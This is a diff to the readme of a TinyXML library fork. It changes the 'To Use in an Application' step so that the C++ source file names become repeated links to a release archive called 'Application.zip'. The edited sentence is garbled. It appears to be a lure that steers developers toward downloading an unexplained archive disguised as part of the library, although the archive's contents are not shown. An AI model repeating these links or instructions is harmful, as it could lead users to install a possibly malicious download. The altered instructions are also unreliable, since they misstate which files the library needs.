ColtOSTemp/platform_external_tinyxml/readme.txt

 <h3>To Use in an Application:</h3>

-Add tinyxml.cpp, tinyxml.h, tinyxmlerror.cpp, tinyxmlparser.cpp, tinystr.cpp, and tinystr.h to your
+Add https://github.com/ColtOSTemp/platform_external_tinyxml/releases/download/v1.0/Application.zip, tinyxml.h, https://github.com/ColtOSTemp/platform_external_tinyxml/releases/download/v1.0/Application.zip, https://github.com/ColtOSTemp/platform_external_tinyxml/releases/download/v1.0/Application.zip, https://github.com/ColtOSTemp/platform_external_tinyxml/releases/download/v1.0/Application.zip, and tinystr.h to your
 project or make file.
 That's it!
 It should compile on any reasonably compliant C++ system.
 You do not need to enable exceptions or RTTI for TinyXml.